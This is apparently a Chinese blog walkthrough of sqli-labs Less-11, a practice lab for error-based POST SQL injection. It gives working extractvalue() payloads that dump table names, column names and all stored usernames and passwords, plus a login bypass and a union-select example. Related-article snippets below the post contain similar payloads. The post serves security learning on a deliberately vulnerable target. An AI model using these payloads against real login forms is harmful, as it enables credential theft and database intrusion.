sqli-labs通关-------11lesson-post(基于错误的POST型单引号字符型注入)

最新推荐文章于 2022-12-14 09:44:15 发布
最新推荐文章于 2022-12-14 09:44:15 发布
阅读量428 收藏 1
点赞数
分类专栏: 安全 sql注入学习总结 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39584315/article/details/94749377
版权

Post 基于表单提交,类似于下图

Sql的注释:--【空格】单行注释 在url中用--+

           # 单行注释

                      /**/ 多行注释

Post注入 个人觉得就是想法设法搞到密码登录或者想办法绕过密码

 

方法一:

我们先随便输入一个账号密码给账号加上反斜杠看看啥情况,发现有报错,so根据报错字段应该是被单引号隐起来的。

于是首先尝试一下万能密码,发现万能密码成功登陆。

 

方法二:

既然是基于爆粗的,我们就可以做很多事情

我们通过bp(burp suite)如何没有用过可以底部私聊邮箱发你资料

我们用bp进行抓包改包

对bp进行如下改包即可。

复现一下语句:

报表:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit

报字段

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

报值

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit

在这里也是有多种报错形式,不唯一

 

方法三就是构造union 和get注入相似

Username=1’ union select 1,2,3;

 

 

枯藤闲画云
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
暑期练习web23:sqli lab第五关 双注入GET单引号字符注入----基于bool的手工盲注
qq_41618162的博客
08-24 1249
如果所查询的用户id在数据库中,可以发现页面显示”You are in”,而不像前4关那样会显示出具体的账号密码 而如果输入的查询语句不存在,则什么也不会返回 这里普及一下盲注时的常用函数 1.mid()函数 mid(striing,start,length) string(必需)规定要返回其中一部分的字符串。 start(必需)规定开始位置(起始值是 1)。 length(...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs less11 基于错误POST单引号字符注入sqlmap)
weixin_44023403的博客
04-11 337
sqli-labs less11 基于错误POST单引号字符注入一、知识储备二、验证漏洞方法一:--data方法二:-r方法三:--forms 一、知识储备 针对post的表单,sqlmap有三种参数可验证: –data 需要自己手工找到参数名以及一些信息 -r 需要自己抓包 –forms sqlmap中的自动抓包获取参数,最方便 二、验证漏洞 首先打开less11; 提交任意数据,用burp抓包; 记下post请求参数;uname=1111&passwd=11111&su
单引号字符注入
热门推荐
Battery的博客
12-14 10万+
判断sql注入漏洞的类:1.数字、2.字符。用and 1=1 和and 1=2来判断。将1=1换成1=2发现没有报错,但不显示信息,说明可以使用字符注入。继续输入and 1=2,页面显示正常,说明不是数字注入漏洞。使用order by,从一开始逐渐增加,一直到报错时停止。通过此处便可以插入更多的sql语句去查询一些信息。id=1,得到用户名和密码。id=1’ and 1=1--+由此可以确认列数为3(因为到4报错)输入and 1=1来,没有变化。可以得到上一步骤账户的密码。
sqli-labs从零开始学习日记(二)
sky_die的专栏
05-08 1832
嗯,这次有个很好用的东西SQLMAP,主要是我看的视频里面他们用的是其他的软件
SQL注入】Less-1错误GET单引号字符注入
Mitchell_Donovan的博客
03-30 322
Less-1错误GET单引号字符注入 什么是单引号字符注入? 通过'的报错进行sql查询,并用mysql能输出字符的函数,获取我们想要的数据。 漏洞复现过程 在实验室浏览器打开Less-1 1、发现注入点 输入?id=1 正常; 输入?id=1' 报错,就存在sql注入漏洞。 2、猜id=1显示条件中表的字段 例如输入?id=1' order by 3 --+ 显示正常 再次输入?id=1' order by 4 --+ 显示错误 所以的出,在?id=1查看的这个表有3个字段
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
基于SQLI的POST字符SQL注入
qq_44060093的博客
08-21 359
实验原理 1.POST方式概述   使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 2.GET和POST的区别: 语义上的区别,get用于获取数据,post用于提交数据。 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据 get参数有长度限制(受限于url长度,具体的数值取决于浏览器和服务器的限制),而post无限制 3.如何判断是否存在POST注入 主要是判断输入框是否存在注入,直接输入一个 '看是否报错(如果存在盲注的话也是不会报错的),
【less-11】基于SQLI的POST字符SQL注入
未名编程
07-17 538
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符SQL注入 实验目的 通过本实验理解区别SQL注入中GET和POST的区别,掌握POSTSQL注入漏洞的手工注入方法,熟悉Burpsuite软件的使用。 实验环境 渗透平台:Kali 目标网站:SQLI平台上的Less-11 实验原理 1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 2.GET和POST的区别: 语义上的区别,get用于.
SQL注入】Less-12基于错误的双引号POST字符变形的注入
Mitchell_Donovan的博客
03-30 270
Less-12基于错误的双引号POST字符变形的注入 方式一 extractvalue报错 1、爆开数据库 payload "*"达到sql注入查询语句闭合!用--+反而不行 name=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit 2、爆开数据表 payload uname=admin" and extractvalue(1,conc
sqli-labs】 less12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST字符变形的注入)...
ajxi63204的博客
01-20 279
加个双引号 通过报错信息猜测SQL语句 select ... from ... where xxx=("") and yyy=("") limit 0,1 将括号闭合掉,通过注释后面的条件登录 转载于:https://www.cnblogs.com/omnis/p/8319595.html...
MySQL联合注入字符注入
m0_50211409的博客
03-27 1723
关于字符注入 首先我们都知道,在数据库中字符串都是被单引号与双引号包裹起来的。 我们分析一下字符注入SQL语句 select*from admin where id='1' 这是字符注入后的语句 我们在传参的时候 ...
sqli-labs-master第一关:基于错误的GET单引号字符注入
weixin_34402408的博客
11-12 419
首先来到第一关: http://127.0.0.1/sqli-labs-master/Less-1/ 用语句http://127.0.0.1/sqli-labs-master/Less-1/?id=1'进行测试报错 可以看到sql语句出错了。 用 and 1 = 1去测试: http://127.0.0.1/sqli-labs-maste...
Web安全攻防的学习——06—(盲注介绍、GET基于时间的盲注、GET基于Boolean的盲注、POST基于错误注入POST基于时间的盲注、SQL注入绕过手段)(重点)
weixin_42118531的博客
03-02 539
1、盲注介绍 Blind SQL(盲注)是注入攻击的其中一种,向数据库发生true或false这样的问题,并根据应用程 序返回的信息判断结果。这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有解决SQL注入存在的代码问题 盲注种类 1.布尔类 2.时间的盲注 GET基于时间的盲注 if(ascii(substr(database(),1,1))=115,1,sleep(3)) # ...
SQL注入POST常规注入
Jim的博客
08-14 1万+
less11单引号字符注入 注入:test' or 1=1 #&password=test sql语句:select username, password from users where username='test' or 1=1 #' and password='test' limit 0,1; 注入:uname=test&passwd=test' or '1'='1 sql语句:
SQL注入】Less-11基于错误POST单引号字符注入
Mitchell_Donovan的博客
03-30 435
Less-11基于错误POST单引号字符注入 首先,这个是在用户登陆进行查询引发的postsql注入,和get差异很大;然后我们已知其中有个用户名dumb,密码dumb;进行登陆看看! 另外本实验将会用到extractvalue()该mysql报错函数进行sql注入;在登陆界面 输入dumb用户名 输入dumb密码 然后我们得到的拦截请求 提交post数据包uname=dumb&passwd=dumb&submit=Submit 不对它进行任何数据包修改,进行发送请求 这

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值